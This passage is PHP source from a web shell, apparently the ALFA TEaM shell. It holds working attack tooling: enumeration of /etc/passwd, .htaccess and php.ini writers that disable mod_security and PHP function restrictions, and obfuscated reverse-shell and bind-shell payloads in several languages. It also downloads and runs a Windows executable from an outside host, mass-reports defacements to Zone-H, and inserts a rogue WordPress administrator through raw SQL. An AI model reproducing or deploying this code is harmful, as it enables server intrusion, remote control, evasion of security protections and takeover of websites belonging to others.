  4089. <form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
  4090. if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
  4091. if(!_alfa_file_exists("/etc/virtual/domainowners")){
  4092. $site = trim($_POST['alfa7']);
  4093. $rep = str_replace(array("https://","http://","www."),"",$site);
  4094. $user = "";
  4095. if(function_exists("posix_getpwuid") && function_exists("fileowner")){
  4096.     if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
  4097.         $user = $user['name'];
  4098.     }
  4099. }else{
  4100.     if(_alfa_can_runCommand(true,true)){
  4101.         $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
  4102.     }
  4103. }
  4104. if(!empty($user)&&$user!='root'){
  4105. echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
  4106. }else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
  4107. }else{
  4108. $site = trim($_POST['alfa7']);
  4109. $rep = str_replace(array("https://","http://","www."),"",$site);
  4110. $users = _alfa_file("/etc/virtual/domainowners");
  4111. foreach($users as $boz){
  4112. $ex = explode(":",$boz);
  4113. if($ex[0] == $rep){
  4114. echo __pre()."<center><table border='1'>
  4115. <tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
  4116. <tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
  4117. if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
  4118. if(!_alfa_file_exists("/etc/virtual/domainowners")){
  4119. echo __pre();
  4120. $i = 0;
  4121. while ($i < 60000) {
  4122. $line = @posix_getpwuid($i);
  4123. if (!empty($line)) {
  4124. while (list ($key, $vl) = each($line)){
  4125. echo $vl."\n";
  4126. break;}}$i++;}
  4127. }else{echo __pre();
  4128. $users = _alfa_file("/etc/virtual/domainowners");
  4129. foreach($users as $boz){
  4130. $user = explode(":",$boz);
  4131. echo trim($user[1]).'<br>';}}}
  4132. if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
  4133. echo __pre();
  4134. if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
  4135. for($uid=0;$uid<60000;$uid++){
  4136. $ara = @posix_getpwuid($uid);
  4137. if(!empty($ara)){
  4138. while(list ($key, $val) = each($ara)){
  4139. echo "$val:";
  4140. }echo "\n";}}
  4141. }else{__alert('failed...');}}
  4142. if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
  4143. @__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
  4144. echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
  4145. }
  4146. if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
  4147. @__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
  4148. echo '<center><b><big> php.ini created...!</center></b></big>';
  4149. }
  4150. if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
  4151. @__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
  4152. echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
  4153. }
  4154. echo "<br></div>";
  4155. alfafooter();
  4156. }
  4157. function __get_resource($content){
  4158. return @gzinflate(__ZGVjb2Rlcg($content));
  4159. }
  4160. function __write_file($file, $content){
  4161. if($fh = @fopen($file, "wb")){
  4162. if(fwrite($fh, $content)!==false) return true;
  4163. }
  4164. return false;
  4165. }
  4166. function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
  4167. $res = "<font color='green'>[ Success...! ]</font>";
  4168. $err = "<font color='red'>[ Failed...! ]</font>";
  4169. if($evalOptions!="") $evalOptions = $evalOptions." ";
  4170. if($evalArguments!="") $evalArguments = " ".$evalArguments;
  4171. if($evalType=="c"){
  4172. $tmpdir = ALFA_TEMPDIR;
  4173. chdir($tmpdir);
  4174. if(is_writable($tmpdir)){
  4175. $uniq = substr(md5(time()),0,8);
  4176. $filename = $evalType.$uniq.".c";
  4177. $path = $filename;
  4178. if(__write_file($path, $evalCode)){
  4179. $ext = ($GLOBALS['sys']=='win')? ".exe":".out";
  4180. $pathres = $filename.$ext;
  4181. $evalOptions = "-o ".$pathres." ".$evalOptions;
  4182. $cmd = "gcc ".$evalOptions.$path;
  4183. alfaEx($cmd);
  4184. if(is_file($pathres)){
  4185. if(chmod($pathres, 0755)){
  4186. $cmd = $pathres.$evalArguments;
  4187. alfaEx($cmd);
  4188. }else{$res = $err;}
  4189. unlink($pathres);
  4190. }else{$res = $err;}
  4191. unlink($path);
  4192. }else{$res = $err;}
  4193. }
  4194. return $res;
  4195. }elseif($evalType=="java"){
  4196. $tmpdir = ALFA_TEMPDIR;
  4197. chdir($tmpdir);
  4198. if(is_writable($tmpdir)){
  4199. if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
  4200. $classname = trim($r[1]);
  4201. $filename = $classname;
  4202. }else{
  4203. $uniq = substr(md5(time()),0,8);
  4204. $filename = $evalType.$uniq;
  4205. $evalCode = "class ".$filename." { ".$evalCode . " } ";
  4206. }
  4207. $path = $filename.".java";
  4208. if(__write_file($path, $evalCode)){
  4209. $cmd = "javac ".$evalOptions.$path;
  4210. alfaEx($cmd);
  4211. $pathres = $filename.".class";
  4212. if(is_file($pathres)){
  4213. if(chmod($pathres, 0755)){
  4214. $cmd = "java ".$filename.$evalArguments;
  4215. alfaEx($cmd);
  4216. }else{$res = $err;}
  4217. unlink($pathres);
  4218. }else{$res = $err;}
  4219. unlink($path);
  4220. }else{$res = $err;}
  4221. }
  4222. return $res;
  4223. }
  4224. return false;
  4225. }
  4226. function alfaconnect(){
  4227. alfahead();
  4228. $php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
  4229. $python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
  4230. $perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
  4231. $ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
  4232. $node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
  4233. $c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
  4234. $java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
  4235. echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
  4236. echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
  4237. <div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
  4238. $cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
  4239. foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
  4240. echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
  4241. if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
  4242. $lang = $_POST['alfa1'];
  4243. $ip = $_POST['alfa2'];
  4244. $port = $_POST['alfa3'];
  4245. $arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
  4246. $tmpdir = ALFA_TEMPDIR;
  4247. $name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
  4248. $allow = array('perl','ruby','python','node');
  4249. eval('$lan=$'.$lang.';');
  4250. if(in_array($lang,$allow)){
  4251. if(__write_file($name,__get_resource($lan))){
  4252. if(_alfa_can_runCommand(true,true)){
  4253. $os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
  4254. $out = alfaEx("$lang $name $arg $os");
  4255. if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
  4256. echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
  4257. }
  4258. }else{
  4259. echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
  4260. }
  4261. }
  4262. if($lang=='java'||$lang=='c'){
  4263. $code = __get_resource($lan);
  4264. $out = nl2br(bcinit($lang, $code,'',''));
  4265. echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
  4266. }
  4267. if($lang=='bcwin'){
  4268. $alfa = new AlfaCURL();
  4269. $s = $alfa->Send('http://solevisible.com/bc/windows.exe');
  4270. $tmpdir = ALFA_TEMPDIR;
  4271. $f = @fopen($tmpdir.'/bcwin.exe','w+');
  4272. @fwrite($f, $s);
  4273. @fclose($f);
  4274. $out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
  4275. }
  4276. if($lang=='php'){
  4277. echo "<pre class=ml1 style='margin-top:5px'>";
  4278. $code = __get_resource($lan);
  4279. if($code!==false){
  4280. $code = "\$target = \"".$arg."\";\n".$code;
  4281. eval($code);
  4282. echo("<center><font color='green'>[ Finished...! ]</font></center>");
  4283. }
  4284. echo "</pre>";
  4285. }
  4286. }
  4287. echo "</div>";
  4288. alfafooter();
  4289. }
  4290. function alfazoneh(){
  4291. alfahead();
  4292. echo '<div class=header>';
  4293. if(!function_exists('curl_version')){
  4294. echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
  4295. }
  4296. $hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
  4297. $reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
  4298. echo '
  4299. <center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
  4300. <form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
  4301. <input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
  4302. <br>
  4303. <select id="text" name="hackmode" style="width:400px;">';
  4304. $x=1;
  4305. foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
  4306. echo '</select><br><select id="text" name="reason" style="width:200px;">';
  4307. $x=1;
  4308. foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
  4309. echo '</select><br>
  4310. <textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
  4311. <p><input type="submit" value=" " name="go" /></p>
  4312. </form></center>';
  4313. if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
  4314. ob_start();
  4315. $hacker = $_POST['alfa1'];
  4316. $method = $_POST['alfa2'];
  4317. $neden = $_POST['alfa3'];
  4318. $site = $_POST['alfa4'];
  4319. if(empty($hacker)){
  4320. die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
  4321. }elseif($method == "------------------------------------SELECT-------------------------------------"){
  4322. die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
  4323. }elseif($neden == "------------------------------------SELECT-------------------------------------"){
  4324. die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
  4325. }elseif(empty($site)){
  4326. die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
  4327. }
  4328. $i = 0;
  4329. $sites = explode("\n", $site);
  4330. $alfa = new AlfaCURL();
  4331. while($i < count($sites)){
  4332. if(substr($sites[$i], 0, 4) != "http"){
  4333. $sites[$i] = "http://".$sites[$i];
  4334. }
  4335. $alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
  4336. ++$i;
  4337. }
  4338. echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
  4339. }
  4340. echo "</div>";
  4341. alfafooter();
  4342. }
  4343. function alfapwchanger(){
  4344. alfahead();
  4345.  
  4346. echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
  4347. <center><h3>';
  4348. $vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
  4349. Alfa_Create_A_Tag('pwchanger',$vals);
  4350. echo '</h3></center>';
  4351. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){
  4352.  
  4353. echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
  4354. <p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
  4355. $table = array('td1' =>
  4356.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4357.  'td2' =>
  4358.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4359.  'td3' =>
  4360.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4361.  'td4' =>
  4362.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4363.  'td5' =>
  4364.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
  4365.  'td6' =>
  4366.  array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4367.  'td7' =>
  4368.  array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4369.  'td8' =>
  4370.  array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4371. );
  4372. create_table($table);
  4373. echo '<p><input value=" " name="send" type="submit"></p></form>';
  4374. if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
  4375. $localhost = $_POST['alfa3'];
  4376. $database = $_POST['alfa4'];
  4377. $username = $_POST['alfa5'];
  4378. $password = $_POST['alfa6'];
  4379. $admin = $_POST['alfa8'];
  4380. $SQL = $_POST['alfa9'];
  4381. $prefix = $_POST['alfa10'];
  4382. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4383. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
  4384. $solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
  4385. $sole = @mysqli_num_rows($solevisible);
  4386. if ($sole == 1){
  4387. $solevis = @mysqli_fetch_assoc($solevisible);
  4388. $res = $solevis['ID'];
  4389. }
  4390. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
  4391. if($solevisible){
  4392. __alert('Success... '.$admin.' is created...');}
  4393. }
  4394. }
  4395. if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){
  4396.  
  4397. echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
  4398. $table = array('td1' =>
  4399.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4400.  'td2' =>
  4401.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4402.  'td3' =>
  4403.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4404.  'td4' =>
